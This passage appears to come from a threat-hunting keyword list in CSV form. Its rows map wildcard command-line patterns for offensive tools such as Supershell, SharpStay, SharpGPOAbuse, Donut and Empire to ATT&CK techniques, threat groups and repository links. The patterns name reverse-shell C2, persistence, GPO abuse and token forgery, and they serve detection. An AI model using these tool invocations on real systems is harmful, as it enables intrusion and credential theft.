loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* 4444 shell,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* '46993522-7D77-4B59-9B77-F82082DE9D81' *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* -64 -format=bof *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -64 -format=dll *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -64 -format=service-dll *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -a 1 -f *.dll -p http*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z
-* -a bruteforce *,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z
-* -a nightmare*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z
-* -a spoolsample*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z
-* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z
-* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z
-* aad3b435b51404eeaad3b435b51404ee*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* acarsd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* -accepteula -nobanner -d cmd.exe /c *,greyware_tool_keyword,psexec,Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Exploitation Tools,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-* --access-token*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* acltoolkit*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z
-* --action exports --dll C:\Windows\System32\amsi.dll*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z
-* action=BackdoorLNK *,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=CreateService servicename=* command=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=ElevatedRegistryKey keyname=Debug keypath*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=ElevatedUserInitKey command=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=JunctionFolder dllpath=*.dll guid=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-"* action=NewLNK filepath=*"" lnkname=*",offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=ScheduledTask taskname=* command=*runasuser*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=ScheduledTaskAction taskname=* command=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=SchTaskCOMHijack clsid=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=UserRegistryKey keyname=Debug keypath=HKCU:*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* action=WMIEventSub command=* eventname=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-* --adcs --old-bloodhound *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z
-* --AddComputerTask --TaskName * --Author * --Command * --Arguments * --GPOName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z
-* --AddLocalAdmin --UserAccount * --GPOName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z
-* address-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* --AddUserRights --UserRights * --UserAccount * --GPOName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z
-* --AddUserScript --ScriptName * --ScriptContents * --GPOName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z
-* --adfs-host * --krb-key * --krb-ticket *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z
-* ADFSpoof.py*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,0,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z
-* adhunt.py *,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z
-* adm2sys.py*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,0,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z
-* admin-panels.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* afp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* afp-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* afp-path-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* afp-serverinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* afp-showmount.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* -AgentDelay *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-* -AgentJitter *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-* ajp-auth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* ajp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* ajp-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* ajp-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* ajp-request.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* Alcatraz.exe*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,0,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z
-* All_attack.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-* allseeingeye-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
